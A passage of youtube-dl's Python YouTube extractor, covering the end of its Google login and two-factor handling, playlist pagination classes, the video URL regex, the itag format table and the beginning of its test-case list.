status = try_get(login_challenge, lambda x: x[5], compat_str)
if status == 'QUOTA_EXCEEDED':
warn('Exceeded the limit of TFA codes, try later')
return False
tl = try_get(challenge_results, lambda x: x[1][2], compat_str)
if not tl:
warn('Unable to extract TL')
return False
tfa_code = self._get_tfa_info('2-step verification code')
if not tfa_code:
warn(
'Two-factor authentication required. Provide it either interactively or with --twofactor <code>'
'(Note that only TOTP (Google Authenticator App) codes work at this time.)')
return False
tfa_code = remove_start(tfa_code, 'G-')
tfa_req = [
user_hash, None, 2, None,
[
9, None, None, None, None, None, None, None,
[None, tfa_code, True, 2]
]]
tfa_results = req(
self._TFA_URL.format(tl), tfa_req,
'Submitting TFA code', 'Unable to submit TFA code')
if tfa_results is False:
return False
tfa_res = try_get(tfa_results, lambda x: x[0][5], list)
if tfa_res:
tfa_msg = try_get(tfa_res, lambda x: x[5], compat_str)
warn(
'Unable to finish TFA: %s' % 'Invalid TFA code'
if tfa_msg == 'INCORRECT_ANSWER_ENTERED' else tfa_msg)
return False
check_cookie_url = try_get(
tfa_results, lambda x: x[0][-1][2], compat_str)
else:
CHALLENGES = {
'LOGIN_CHALLENGE': "This device isn't recognized. For your security, Google wants to make sure it's really you.",
'USERNAME_RECOVERY': 'Please provide additional information to aid in the recovery process.',
'REAUTH': "There is something unusual about your activity. For your security, Google wants to make sure it's really you.",
}
challenge = CHALLENGES.get(
challenge_str,
'%s returned error %s.' % (self.IE_NAME, challenge_str))
warn('%s\nGo to https://accounts.google.com/, login and solve a challenge.' % challenge)
return False
else:
check_cookie_url = try_get(res, lambda x: x[2], compat_str)
if not check_cookie_url:
warn('Unable to extract CheckCookie URL')
return False
check_cookie_results = self._download_webpage(
check_cookie_url, None, 'Checking cookie', fatal=False)
if check_cookie_results is False:
return False
if 'https://myaccount.google.com/' not in check_cookie_results:
warn('Unable to log in')
return False
return True
def _download_webpage_handle(self, *args, **kwargs):
query = kwargs.get('query', {}).copy()
query['disable_polymer'] = 'true'
kwargs['query'] = query
return super(YoutubeBaseInfoExtractor, self)._download_webpage_handle(
*args, **compat_kwargs(kwargs))
def _real_initialize(self):
if self._downloader is None:
return
self._set_language()
if not self._login():
return
class YoutubeEntryListBaseInfoExtractor(YoutubeBaseInfoExtractor):
# Extract entries from page with "Load more" button
def _entries(self, page, playlist_id):
more_widget_html = content_html = page
for page_num in itertools.count(1):
for entry in self._process_page(content_html):
yield entry
mobj = re.search(r'data-uix-load-more-href="/?(?P<more>[^"]+)"', more_widget_html)
if not mobj:
break
more = self._download_json(
'https://youtube.com/%s' % mobj.group('more'), playlist_id,
'Downloading page #%s' % page_num,
transform_source=uppercase_escape)
content_html = more['content_html']
if not content_html.strip():
# Some webpages show a "Load more" button but they don't
# have more videos
break
more_widget_html = more['load_more_widget_html']
class YoutubePlaylistBaseInfoExtractor(YoutubeEntryListBaseInfoExtractor):
def _process_page(self, content):
for video_id, video_title in self.extract_videos_from_page(content):
yield self.url_result(video_id, 'Youtube', video_id, video_title)
def extract_videos_from_page(self, page):
ids_in_page = []
titles_in_page = []
for mobj in re.finditer(self._VIDEO_RE, page):
# The link with index 0 is not the first video of the playlist (not sure if still actual)
if 'index' in mobj.groupdict() and mobj.group('id') == '0':
continue
video_id = mobj.group('id')
video_title = unescapeHTML(mobj.group('title'))
if video_title:
video_title = video_title.strip()
try:
idx = ids_in_page.index(video_id)
if video_title and not titles_in_page[idx]:
titles_in_page[idx] = video_title
except ValueError:
ids_in_page.append(video_id)
titles_in_page.append(video_title)
return zip(ids_in_page, titles_in_page)
class YoutubePlaylistsBaseInfoExtractor(YoutubeEntryListBaseInfoExtractor):
def _process_page(self, content):
for playlist_id in orderedSet(re.findall(
r'<h3[^>]+class="[^"]*yt-lockup-title[^"]*"[^>]*><a[^>]+href="/?playlist\?list=([0-9A-Za-z-_]{10,})"',
content)):
yield self.url_result(
'https://www.youtube.com/playlist?list=%s' % playlist_id, 'YoutubePlaylist')
def _real_extract(self, url):
playlist_id = self._match_id(url)
webpage = self._download_webpage(url, playlist_id)
title = self._og_search_title(webpage, fatal=False)
return self.playlist_result(self._entries(webpage, playlist_id), playlist_id, title)
class YoutubeIE(YoutubeBaseInfoExtractor):
IE_DESC = 'YouTube.com'
_VALID_URL = r"""(?x)^
(
(?:https?://|//) # http(s):// or protocol-independent URL
(?:(?:(?:(?:\w+\.)?[yY][oO][uU][tT][uU][bB][eE](?:-nocookie)?\.com/|
(?:www\.)?deturl\.com/www\.youtube\.com/|
(?:www\.)?pwnyoutube\.com/|
(?:www\.)?hooktube\.com/|
(?:www\.)?yourepeat\.com/|
tube\.majestyc\.net/|
(?:(?:www|dev)\.)?invidio\.us/|
(?:www\.)?invidiou\.sh/|
(?:www\.)?invidious\.snopyta\.org/|
(?:www\.)?invidious\.kabi\.tk/|
(?:www\.)?vid\.wxzm\.sx/|
youtube\.googleapis\.com/) # the various hostnames, with wildcard subdomains
(?:.*?\#/)? # handle anchor (#/) redirect urls
(?: # the various things that can precede the ID:
(?:(?:v|embed|e)/(?!videoseries)) # v/ or embed/ or e/
|(?: # or the v= param in all its forms
(?:(?:watch|movie)(?:_popup)?(?:\.php)?/?)? # preceding watch(_popup|.php) or nothing (like /?v=xxxx)
(?:\?|\#!?) # the params delimiter ? or # or #!
(?:.*?[&;])?? # any other preceding param (like /?s=tuff&v=xxxx or ?s=tuff&v=V36LpHqtcDY)
v=
)
))
|(?:
youtu\.be| # just youtu.be/xxxx
vid\.plus| # or vid.plus/xxxx
zwearz\.com/watch| # or zwearz.com/watch/xxxx
)/
|(?:www\.)?cleanvideosearch\.com/media/action/yt/watch\?videoId=
)
)? # all until now is optional -> you can pass the naked ID
([0-9A-Za-z_-]{11}) # here is it! the YouTube video ID
(?!.*?\blist=
(?:
%(playlist_id)s| # combined list/video URLs are handled by the playlist IE
WL # WL are handled by the watch later IE
)
)
(?(1).+)? # if we found the ID, everything can follow
$""" % {'playlist_id': YoutubeBaseInfoExtractor._PLAYLIST_ID_RE}
_NEXT_URL_RE = r'[\?&]next_url=([^&]+)'
_formats = {
'5': {'ext': 'flv', 'width': 400, 'height': 240, 'acodec': 'mp3', 'abr': 64, 'vcodec': 'h263'},
'6': {'ext': 'flv', 'width': 450, 'height': 270, 'acodec': 'mp3', 'abr': 64, 'vcodec': 'h263'},
'13': {'ext': '3gp', 'acodec': 'aac', 'vcodec': 'mp4v'},
'17': {'ext': '3gp', 'width': 176, 'height': 144, 'acodec': 'aac', 'abr': 24, 'vcodec': 'mp4v'},
'18': {'ext': 'mp4', 'width': 640, 'height': 360, 'acodec': 'aac', 'abr': 96, 'vcodec': 'h264'},
'22': {'ext': 'mp4', 'width': 1280, 'height': 720, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'34': {'ext': 'flv', 'width': 640, 'height': 360, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
'35': {'ext': 'flv', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
# itag 36 videos are either 320x180 (BaW_jenozKc) or 320x240 (__2ABJjxzNo), abr varies as well
'36': {'ext': '3gp', 'width': 320, 'acodec': 'aac', 'vcodec': 'mp4v'},
'37': {'ext': 'mp4', 'width': 1920, 'height': 1080, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'38': {'ext': 'mp4', 'width': 4096, 'height': 3072, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'43': {'ext': 'webm', 'width': 640, 'height': 360, 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8'},
'44': {'ext': 'webm', 'width': 854, 'height': 480, 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8'},
'45': {'ext': 'webm', 'width': 1280, 'height': 720, 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8'},
'46': {'ext': 'webm', 'width': 1920, 'height': 1080, 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8'},
'59': {'ext': 'mp4', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
'78': {'ext': 'mp4', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
# 3D videos
'82': {'ext': 'mp4', 'height': 360, 'format_note': '3D', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -20},
'83': {'ext': 'mp4', 'height': 480, 'format_note': '3D', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -20},
'84': {'ext': 'mp4', 'height': 720, 'format_note': '3D', 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264', 'preference': -20},
'85': {'ext': 'mp4', 'height': 1080, 'format_note': '3D', 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264', 'preference': -20},
'100': {'ext': 'webm', 'height': 360, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8', 'preference': -20},
'101': {'ext': 'webm', 'height': 480, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8', 'preference': -20},
'102': {'ext': 'webm', 'height': 720, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8', 'preference': -20},
# Apple HTTP Live Streaming
'91': {'ext': 'mp4', 'height': 144, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'92': {'ext': 'mp4', 'height': 240, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'93': {'ext': 'mp4', 'height': 360, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -10},
'94': {'ext': 'mp4', 'height': 480, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -10},
'95': {'ext': 'mp4', 'height': 720, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 256, 'vcodec': 'h264', 'preference': -10},
'96': {'ext': 'mp4', 'height': 1080, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 256, 'vcodec': 'h264', 'preference': -10},
'132': {'ext': 'mp4', 'height': 240, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'151': {'ext': 'mp4', 'height': 72, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 24, 'vcodec': 'h264', 'preference': -10},
# DASH mp4 video
'133': {'ext': 'mp4', 'height': 240, 'format_note': 'DASH video', 'vcodec': 'h264'},
'134': {'ext': 'mp4', 'height': 360, 'format_note': 'DASH video', 'vcodec': 'h264'},
'135': {'ext': 'mp4', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'h264'},
'136': {'ext': 'mp4', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'h264'},
'137': {'ext': 'mp4', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'h264'},
'138': {'ext': 'mp4', 'format_note': 'DASH video', 'vcodec': 'h264'}, # Height can vary (https://github.com/ytdl-org/youtube-dl/issues/4559)
'160': {'ext': 'mp4', 'height': 144, 'format_note': 'DASH video', 'vcodec': 'h264'},
'212': {'ext': 'mp4', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'h264'},
'264': {'ext': 'mp4', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'h264'},
'298': {'ext': 'mp4', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'h264', 'fps': 60},
'299': {'ext': 'mp4', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'h264', 'fps': 60},
'266': {'ext': 'mp4', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'h264'},
# Dash mp4 audio
'139': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 48, 'container': 'm4a_dash'},
'140': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 128, 'container': 'm4a_dash'},
'141': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 256, 'container': 'm4a_dash'},
'256': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'container': 'm4a_dash'},
'258': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'container': 'm4a_dash'},
'325': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'dtse', 'container': 'm4a_dash'},
'328': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'ec-3', 'container': 'm4a_dash'},
# Dash webm
'167': {'ext': 'webm', 'height': 360, 'width': 640, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'168': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'169': {'ext': 'webm', 'height': 720, 'width': 1280, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'170': {'ext': 'webm', 'height': 1080, 'width': 1920, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'218': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'219': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'278': {'ext': 'webm', 'height': 144, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp9'},
'242': {'ext': 'webm', 'height': 240, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'243': {'ext': 'webm', 'height': 360, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'244': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'245': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'246': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'247': {'ext': 'webm', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'248': {'ext': 'webm', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'271': {'ext': 'webm', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'vp9'},
# itag 272 videos are either 3840x2160 (e.g. RtoitU2A-3E) or 7680x4320 (sLprVF6d7Ug)
'272': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'302': {'ext': 'webm', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'303': {'ext': 'webm', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'308': {'ext': 'webm', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'313': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'315': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
# Dash webm audio
'171': {'ext': 'webm', 'acodec': 'vorbis', 'format_note': 'DASH audio', 'abr': 128},
'172': {'ext': 'webm', 'acodec': 'vorbis', 'format_note': 'DASH audio', 'abr': 256},
# Dash webm audio with opus inside
'249': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 50},
'250': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 70},
'251': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 160},
# RTMP (unnamed)
'_rtmp': {'protocol': 'rtmp'},
}
_SUBTITLE_FORMATS = ('srv1', 'srv2', 'srv3', 'ttml', 'vtt')
_GEO_BYPASS = False
IE_NAME = 'youtube'
_TESTS = [
{
'url': 'https://www.youtube.com/watch?v=BaW_jenozKc&t=1s&end=9',
'info_dict': {
'id': 'BaW_jenozKc',
'ext': 'mp4',
'title': 'youtube-dl test video "\'/\\ä↭𝕐',
'uploader': 'Philipp Hagemeister',
'uploader_id': 'phihag',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/phihag',
'channel_id': 'UCLqxVugv74EIW3VWh2NOa3Q',
'channel_url': r're:https?://(?:www\.)?youtube\.com/channel/UCLqxVugv74EIW3VWh2NOa3Q',
'upload_date': '20121002',
'description': 'test chars: "\'/\\ä↭𝕐\ntest URL: https://github.com/rg3/youtube-dl/issues/1892\n\nThis is a test video for youtube-dl.\n\nFor more information, contact phihag@phihag.de .',
'categories': ['Science & Technology'],
'tags': ['youtube-dl'],
'duration': 10,
'view_count': int,
'like_count': int,
'dislike_count': int,
'start_time': 1,
'end_time': 9,
}
},
{
'url': 'https://www.youtube.com/watch?v=UxxajLWwzqY',
'note': 'Test generic use_cipher_signature video (#897)',
'info_dict': {
'id': 'UxxajLWwzqY',
'ext': 'mp4',
'upload_date': '20120506',
'title': 'Icona Pop - I Love It (feat. Charli XCX) [OFFICIAL VIDEO]',
'alt_title': 'I Love It (feat. Charli XCX)',
'description': 'md5:f3ceb5ef83a08d95b9d146f973157cc8',
'tags': ['Icona Pop i love it', 'sweden', 'pop music', 'big beat records', 'big beat', 'charli',
'xcx', 'charli xcx', 'girls', 'hbo', 'i love it', "i don't care", 'icona', 'pop',
'iconic ep', 'iconic', 'love', 'it'],
'duration': 180,
'uploader': 'Icona Pop',
'uploader_id': 'IconaPop',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/IconaPop',
'creator': 'Icona Pop',
'track': 'I Love It (feat. Charli XCX)',
'artist': 'Icona Pop',
}
},
{
'url': 'https://www.youtube.com/watch?v=07FYdnEawAQ',
'note': 'Test VEVO video with age protection (#956)',
'info_dict': {
'id': '07FYdnEawAQ',
'ext': 'mp4',
'upload_date': '20130703',
'title': 'Justin Timberlake - Tunnel Vision (Official Music Video) (Explicit)',
'alt_title': 'Tunnel Vision',
'description': 'md5:07dab3356cde4199048e4c7cd93471e1',
'duration': 419,
'uploader': 'justintimberlakeVEVO',
'uploader_id': 'justintimberlakeVEVO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/justintimberlakeVEVO',
'creator': 'Justin Timberlake',
'track': 'Tunnel Vision',
'artist': 'Justin Timberlake',
'age_limit': 18,
}
},
{
'url': '//www.YouTube.com/watch?v=yZIXLfi8CZQ',
'note': 'Embed-only video (#1746)',
'info_dict': {
'id': 'yZIXLfi8CZQ',
'ext': 'mp4',
'upload_date': '20120608',
'title': 'Principal Sexually Assaults A Teacher - Episode 117 - 8th June 2012',
'description': 'md5:09b78bd971f1e3e289601dfba15ca4f7',
'uploader': 'SET India',
'uploader_id': 'setindia',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/setindia',
'age_limit': 18,
}
},
{
'url': 'https://www.youtube.com/watch?v=BaW_jenozKc&v=UxxajLWwzqY',
'note': 'Use the first video ID in the URL',
'info_dict': {
'id': 'BaW_jenozKc',
'ext': 'mp4',
'title': 'youtube-dl test video "\'/\\ä↭𝕐',
'uploader': 'Philipp Hagemeister',
'uploader_id': 'phihag',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/phihag',
'upload_date': '20121002',
'description': 'test chars: "\'/\\ä↭𝕐\ntest URL: https://github.com/rg3/youtube-dl/issues/1892\n\nThis is a test video for youtube-dl.\n\nFor more information, contact phihag@phihag.de .',
'categories': ['Science & Technology'],
'tags': ['youtube-dl'],
'duration': 10,
'view_count': int,
'like_count': int,
'dislike_count': int,
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.youtube.com/watch?v=a9LDPn-MO4I',
'note': '256k DASH audio (format 141) via DASH manifest',
'info_dict': {
'id': 'a9LDPn-MO4I',
'ext': 'm4a',
'upload_date': '20121002',
'uploader_id': '8KVIDEO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/8KVIDEO',
'description': '',
'uploader': '8KVIDEO',
'title': 'UHDTV TEST 8K VIDEO.mp4'
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141',
},
'skip': 'format 141 not served anymore',
},
# DASH manifest with encrypted signature
{
'url': 'https://www.youtube.com/watch?v=IB3lcPjvWLA',
'info_dict': {
'id': 'IB3lcPjvWLA',
'ext': 'm4a',
'title': 'Afrojack, Spree Wilson - The Spark (Official Music Video) ft. Spree Wilson',
'description': 'md5:8f5e2b82460520b619ccac1f509d43bf',
'duration': 244,
'uploader': 'AfrojackVEVO',
'uploader_id': 'AfrojackVEVO',
'upload_date': '20131011',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141/bestaudio[ext=m4a]',
},
},
# JS player signature function name containing $
{
'url': 'https://www.youtube.com/watch?v=nfWlot6h_JM',
'info_dict': {
'id': 'nfWlot6h_JM',
'ext': 'm4a',
'title': 'Taylor Swift - Shake It Off',
'description': 'md5:bec2185232c05479482cb5a9b82719bf',
'duration': 242,
'uploader': 'TaylorSwiftVEVO',
'uploader_id': 'TaylorSwiftVEVO',
'upload_date': '20140818',
'creator': 'Taylor Swift',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141/bestaudio[ext=m4a]',
},
},
# Controversy video
{
'url': 'https://www.youtube.com/watch?v=T4XJQO3qol8',
'info_dict': {
'id': 'T4XJQO3qol8',
'ext': 'mp4',
'duration': 219,
'upload_date': '20100909',
'uploader': 'Amazing Atheist',
'uploader_id': 'TheAmazingAtheist',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/TheAmazingAtheist',
'title': 'Burning Everyone\'s Koran',
'description': 'SUBSCRIBE: http://www.youtube.com/saturninefilms\n\nEven Obama has taken a stand against freedom on this issue: http://www.huffingtonpost.com/2010/09/09/obama-gma-interview-quran_n_710282.html',
}
},
# Normal age-gate video (No vevo, embed allowed)
{
'url': 'https://youtube.com/watch?v=HtVdAasjOgU',
'info_dict': {
'id': 'HtVdAasjOgU',
'ext': 'mp4',
'title': 'The Witcher 3: Wild Hunt - The Sword Of Destiny Trailer',
'description': r're:(?s).{100,}About the Game\n.*?The Witcher 3: Wild Hunt.{100,}',
'duration': 142,
'uploader': 'The Witcher',
'uploader_id': 'WitcherGame',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/WitcherGame',
'upload_date': '20140605',
'age_limit': 18,
},
},
# Age-gate video with encrypted signature
{
'url': 'https://www.youtube.com/watch?v=6kLq3WMV1nU',
'info_dict': {
'id': '6kLq3WMV1nU',
'ext': 'mp4',
'title': 'Dedication To My Ex (Miss That) (Lyric Video)',
'description': 'md5:33765bb339e1b47e7e72b5490139bb41',
'duration': 246,
'uploader': 'LloydVEVO',
'uploader_id': 'LloydVEVO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/LloydVEVO',
'upload_date': '20110629',
'age_limit': 18,
},
},
# video_info is None (https://github.com/ytdl-org/youtube-dl/issues/4421)
# YouTube Red ad is not captured for creator
{
'url': '__2ABJjxzNo',
'info_dict': {
'id': '__2ABJjxzNo',
'ext': 'mp4',
'duration': 266,
'upload_date': '20100430',
'uploader_id': 'deadmau5',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/deadmau5',
'creator': 'deadmau5',
'description': 'md5:12c56784b8032162bb936a5f76d55360',
'uploader': 'deadmau5',
'title': 'Deadmau5 - Some Chords (HD)',
'alt_title': 'Some Chords',
},
'expected_warnings': [
'DASH manifest missing',
]
},
# Olympics (https://github.com/ytdl-org/youtube-dl/issues/4431)
{
'url': 'lqQg6PlCWgI',
'info_dict': {
'id': 'lqQg6PlCWgI',
'ext': 'mp4',
'duration': 6085,
'upload_date': '20150827',
'uploader_id': 'olympic',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/olympic',
'description': 'HO09 - Women - GER-AUS - Hockey - 31 July 2012 - London 2012 Olympic Games',
'uploader': 'Olympic',
'title': 'Hockey - Women - GER-AUS - London 2012 Olympic Games',
},
'params': {
'skip_download': 'requires avconv',
}
},
# Non-square pixels
{
'url': 'https://www.youtube.com/watch?v=_b-2C3KPAM0',
'info_dict': {
'id': '_b-2C3KPAM0',
'ext': 'mp4',
'stretched_ratio': 16 / 9.,
'duration': 85,
'upload_date': '20110310',
'uploader_id': 'AllenMeow',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/AllenMeow',
'description': 'made by Wacom from Korea | 字幕&加油添醋 by TY\'s Allen | 感謝heylisa00cavey1001同學熱情提供梗及翻譯',
'uploader': '孫ᄋᄅ',
'title': '[A-made] 變態妍字幕版 太妍 我就是這樣的人',
},
},
# url_encoded_fmt_stream_map is empty string
{
'url': 'qEJwOuvDf7I',
'info_dict': {
'id': 'qEJwOuvDf7I',
'ext': 'webm',
'title': 'Обсуждение судебной практики по выборам 14 сентября 2014 года в Санкт-Петербурге',
'description': '',
'upload_date': '20150404',
'uploader_id': 'spbelect',
'uploader': 'Наблюдатели Петербурга',
},
'params': {
'skip_download': 'requires avconv',
},
'skip': 'This live event has ended.',
},
# Extraction from multiple DASH manifests (https://github.com/ytdl-org/youtube-dl/pull/6097)
{
'url': 'https://www.youtube.com/watch?v=FIl7x6_3R5Y',
'info_dict': {
'id': 'FIl7x6_3R5Y',
'ext': 'webm',
'title': 'md5:7b81415841e02ecd4313668cde88737a',
'description': 'md5:116377fd2963b81ec4ce64b542173306',
'duration': 220,
'upload_date': '20150625',
'uploader_id': 'dorappi2000',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/dorappi2000',
'uploader': 'dorappi2000',
'formats': 'mincount:31',
},
'skip': 'not actual anymore',
},
# DASH manifest with segment_list
{
'url': 'https://www.youtube.com/embed/CsmdDsKjzN8',
'md5': '8ce563a1d667b599d21064e982ab9e31',
'info_dict': {
'id': 'CsmdDsKjzN8',
'ext': 'mp4',
'upload_date': '20150501', # According to '<meta itemprop="datePublished"', but in other places it's 20150510
'uploader': 'Airtek',
'description': 'Retransmisión en directo de la XVIII media maratón de Zaragoza.',
'uploader_id': 'UCzTzUmjXxxacNnL8I3m4LnQ',
'title': 'Retransmisión XVIII Media maratón Zaragoza 2015',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '135', # bestvideo
},
'skip': 'This live event has ended.',
},
{
# Multifeed videos (multiple cameras), URL is for Main Camera
'url': 'https://www.youtube.com/watch?v=jqWvoWXjCVs',
'info_dict': {
'id': 'jqWvoWXjCVs',
'title': 'teamPGP: Rocket League Noob Stream',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
},
'playlist': [{
'info_dict': {
'id': 'jqWvoWXjCVs',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (Main Camera)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7335,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}, {
'info_dict': {
'id': '6h8e8xoXJzg',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (kreestuh)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7337,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}, {
'info_dict': {
'id': 'PUOgX5z9xZw',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (grizzle)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7337,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}, {
'info_dict': {
'id': 'teuwxikvS5k',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (zim)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7334,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}],
'params': {
'skip_download': True,
},
'skip': 'This video is not available.',
},
{
# Multifeed video with comma in title (see https://github.com/ytdl-org/youtube-dl/issues/8536)
'url': 'https://www.youtube.com/watch?v=gVfLd0zydlo',
'info_dict': {
'id': 'gVfLd0zydlo',
'title': 'DevConf.cz 2016 Day 2 Workshops 1 14:00 - 15:30',
},
'playlist_count': 2,
'skip': 'Not multifeed anymore',
},
{
'url': 'https://vid.plus/FlRa-iH7PGw',
'only_matching': True,
},
{
'url': 'https://zwearz.com/watch/9lWxNJF-ufM/electra-woman-dyna-girl-official-trailer-grace-helbig.html',
'only_matching': True,
},
{
# Title with JS-like syntax "};" (see https://github.com/ytdl-org/youtube-dl/issues/7468)
# Also tests cut-off URL expansion in video description (see
# https://github.com/ytdl-org/youtube-dl/issues/1892,
# https://github.com/ytdl-org/youtube-dl/issues/8164)
'url': 'https://www.youtube.com/watch?v=lsguqyKfVQg',
'info_dict': {
'id': 'lsguqyKfVQg',
'ext': 'mp4',
'title': '{dark walk}; Loki/AC/Dishonored; collab w/Elflover21',
'alt_title': 'Dark Walk - Position Music',
'description': 'md5:8085699c11dc3f597ce0410b0dcbb34a',
'duration': 133,
'upload_date': '20151119',
'uploader_id': 'IronSoulElf',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/IronSoulElf',
'uploader': 'IronSoulElf',
'creator': 'Todd Haberman, Daniel Law Heath and Aaron Kaplan',
'track': 'Dark Walk - Position Music',
'artist': 'Todd Haberman, Daniel Law Heath and Aaron Kaplan',
},
'params': {
'skip_download': True,
},
},
{
# Tags with '};' (see https://github.com/ytdl-org/youtube-dl/issues/7468)
'url': 'https://www.youtube.com/watch?v=Ms7iBXnlUO8',
'only_matching': True,
},
{
# Video with yt:stretch=17:0
'url': 'https://www.youtube.com/watch?v=Q39EVAstoRM',
'info_dict': {
